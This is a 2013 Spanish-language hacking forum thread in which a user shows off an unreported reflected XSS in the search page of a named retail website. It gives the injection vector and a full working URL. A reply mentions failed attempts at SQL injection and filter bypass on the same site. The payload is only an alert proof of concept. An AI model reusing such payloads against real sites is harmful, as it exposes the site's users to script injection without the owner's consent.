Underc0de - Hacking y seguridad informática

[In]Seguridad Informática => Bugs y Exploits => Hacking ShowOff => Mensaje iniciado por: el capi en Septiembre 20, 2013, 10:11:47 am

Título: [XSS] Coppel.com
Publicado por: el capi en Septiembre 20, 2013, 10:11:47 am
(http://oi44.tinypic.com/1570q9y.jpg)
Path vulnerable: search
Vector: "><script>alert('XSS')</script>"
Reportado: No
Autor: El capi
URL= http://www.coppel.com/search.php?numciudad=4&search="><script>alert('XSS')</script>&page=5 
Título: Re:[XSS] Coppel.com
Publicado por: Cronos en Septiembre 21, 2013, 01:10:32 pm
Muy buena! Trate de buscarle Sqli pero filtra muy bien los espacios y todos los caracteres que por lo menos yo uso para saltar el filtro este :/
Saludos,, Cronos.-